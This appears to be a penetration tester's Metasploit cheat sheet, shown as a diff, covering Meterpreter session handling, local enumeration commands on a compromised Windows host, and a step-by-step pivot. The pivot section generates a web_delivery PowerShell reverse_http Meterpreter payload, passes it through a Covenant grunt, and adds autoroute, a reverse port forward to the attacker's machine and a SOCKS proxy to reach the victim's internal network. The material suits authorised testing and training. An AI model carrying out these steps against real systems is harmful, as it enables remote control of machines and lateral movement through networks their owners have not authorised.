CSbyGB/pentips/Tools/Metasploit.md

 - In your metasploit shell launch `sessions`
 - We should see a new meterpreter sessions from our taget machine
 - To interact with it we can do `sessions -i number-of-session`

+## Local Enumeration

+- Let's suppose we have a shell
+- We interact with it using `sessions -i number-of-session` (type `sessions` to list the available sessions)
+- `sysinfo` will give info on win version, architecture etc
+- `getuid` to have current user info
+- `ipconfig` to get network info
+- `arp` other information about network
+- `netstat -ano` to get info on listener and other
+- `ps to check processes
+- `run post/windows/gather/enum_services` enumerate services
+- `run post/windows/gather/enum_applications` enumerate applications
+- `run post/windows/gather/enum_domains` enumerate domains (works better on msf5 than 6)
+- `route` check out routes

+## Reverse port forwarding and Session Passing with initial shell on Covenant

+- We can assume that we have a shell with covenant for instance
+- We generate a payload with metasploit through web delivery (more stealthy because it can pass as http traffic)
+- `use exploit/multi/script/web_delivery`
+- `set target 2` (for powershell)
+- `set payload windows/x64/meterpreter/reverse_http`
+- set lhost to your attacking machine
+- sel an lport
+- `exploit -j`
+- Now we can copy the payload and paste to our grunt in Covenant
+- Metasploit should now have opened a session
+- We can choose an interface with `ipconfig`
+- `run autoroute -s 192.168.16.0/24`
+- We can check it's been done using `run autoroute -p`
+- We can now set up a reverse port forward
+- `portfwd add -R -p 1234 -l 443 -L ATTACKING-MACHINE-IP`
+- We can check it's been done using `portfwd`
+- we can background our session with CTRL-Z
+- We will setup a socks proxy `use auxiliary/server/socks4a`
+- We need to check our port in `/etc/proxychains4.conf`
+- `set srvport 9050`
+- we can check our jobs using `jobs`
+- We can kill the web delivery one that we do not need anymore `jobs -k ID-OF-JOB`
+- We now need to create a listener on covenant that will interact with the port forward set previously:
+  `1      192.168.3.28:443  0.0.0.0:1234  Reverse`
+- BindAddress can stay at 0.0.0.0, BindPort should be 443, connectPort should be 1234 and connect address is the ip of our victime machine.
+- We should now be able to reach other machine in the network of the initial machine that has now route to our attacking machine using proxychains